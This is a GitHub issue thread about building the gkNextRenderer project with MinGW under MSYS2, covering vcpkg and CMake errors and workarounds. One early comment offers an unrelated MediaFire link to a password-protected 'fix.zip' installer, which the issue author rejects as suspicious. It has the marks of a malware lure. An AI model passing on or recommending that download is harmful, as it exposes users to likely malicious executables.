### ISSUE TITLE
mingw build?

### ISSUE THREAD

**Issue by tigrazone** [gameknife/gkNextRenderer#66]
is it possible to create MinGW build of renderer?

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tigrazone** [comment]
@PiaoR what is it?
I dont need your strange password encoded zips with exes from Russian Federation.
Thank you
![image](https://github.com/user-attachments/assets/ac49659c-7cb9-4cc5-98ff-c2862b4f2c2a)

**Comment by gameknife** [comment]
using linux toolchain but msvc compiler? if vcpkg support it, that is an option

**Comment by tigrazone** [comment]
Mingw use gcc, not msvc

**Comment by gameknife** [comment]
Build & Run on my MSYS2 MINGW64 environment, updated the README.md

https://github.com/gameknife/gkNextRenderer/commit/7e7afcf77a7dde2f0257756abf862b113b0e9266

**Comment by tigrazone** [comment]
It is great.
Thank you!
But I have a trouble. I download and install cleam MSYS2 MINGW64 and do pacman magic
`pacman -S --needed git base-devel mingw-w64-x86_64-toolchain cmake ninja`
and call ./vcpkg_mingw.sh
![image](https://github.com/user-attachments/assets/780b4b1d-97bc-46b3-b71e-bba91fc50d07)
if I ignore and call ./build_mingw.sh
I have
![image](https://github.com/user-attachments/assets/b6ae3943-0472-4882-a354-dba830bf7795)

**Comment by tigrazone** [comment]
C:\msys64-1\home\user\gkNextRenderer\build\vcpkg.mingw\buildtrees\detect_co
mpiler\stdout-x64-mingw-static.log:
CMake Error at C:/msys64-1/home/user/gkNextRenderer/build/vcpkg.mingw/scripts/ports.cmake:138 (message):
  Cannot find port:

    Directory does not exist: C;/msys64-1/home/user/gkNextRenderer/build/vcpkg.mingw/scripts/detect_compiler

**Comment by gameknife** [comment]
use msys2 **mingw**, not the msys2 **ucrt**

**Comment by tigrazone** [comment]
![Буфер обмена-1](https://github.com/user-attachments/assets/784c242e-31ff-4069-95ff-5829aec63234)

**Comment by gameknife** [comment]
I met this issue last night, its weired, maybe the mixed usage of UCRT and MINGW cause it.
 I reinstall msys2, clean use MINGW64 is ok.

**Comment by tigrazone** [comment]
I use clean install of msys2/MINGW64

**Comment by tigrazone** [comment]
it was curious but I do
`start`
and in windows cmd type 
`vcpkg_mingw.sh`
started mingw's terminal and after download vcpkg.exe exited
after it I just type
`./vcpkg_mingw.sh`
in mingw terminal and all loaded and setuped ok
strange system :-)

**Comment by tigrazone** [comment]
![mingw-build](https://github.com/user-attachments/assets/f4186312-1856-49ee-8e07-60029ae56254)
new issue

**Comment by gameknife** [comment]
cmake's module FindVulkan has a little bug on MingGW, try modified FindVulkan.cmake as below set(_Vulkan_library_name vulkan) -> set(_Vulkan_library_name vulkan-1) then, execute scripts bellow

**Comment by tigrazone** [comment]
![image](https://github.com/user-attachments/assets/d74bfebd-abed-4976-ae4f-82c23e28a6b8)
change doesnt help.
same issue

**Comment by tigrazone** [comment]
I copy from paths
user@WIN-BMGIMTPHQ1L MINGW64 ~/from-git/gkNextRenderer-my-private
$ export VK_SDK_PATH="C:\VulkanSDK\1.3.275.0"

user@WIN-BMGIMTPHQ1L MINGW64 ~/from-git/gkNextRenderer-my-private
$ export VULKAN_SDK="C:\VulkanSDK\1.3.275.0"

But somehow found version "1.3.290" which is not installed on my machine. maybe vcpkg make issue?

**Comment by gameknife** [comment]
Vulkan_library is the vulkan-1.dll, it has to be exist to continue, above solution can fix this problem on my machine

**Comment by gameknife** [comment]
remove mingw's cmake that installed from pacman, use the cmake from vcpkg its self, all things ok...

**Comment by gameknife** [comment]
I have met issues above today, and I found a trick routine:

pacman -R cmake
./vcpkg_mingw.sh
pacman -S cmake
./build_mingw.sh

it works, and here's the result: 
![image](https://github.com/user-attachments/assets/9a06b38f-ee9c-4fe3-a520-91893042b03a)

**Comment by gameknife** [comment]
I have double check this issue, when you met

> Directory does not exist: C;/msys64-1/home/user/gkNextRenderer/build/vcpkg.mingw/scripts/detect_compiler

that means the msys's cmake version is not correct, remove it and use the self-contained cmake. use these work around:

```
pacman -R cmake
./vcpkg_mingw.sh
pacman -S cmake
./build_mingw.sh
```

to setup vcpkg is the solution, after vcpkg setup, install msys's cmake back is ok
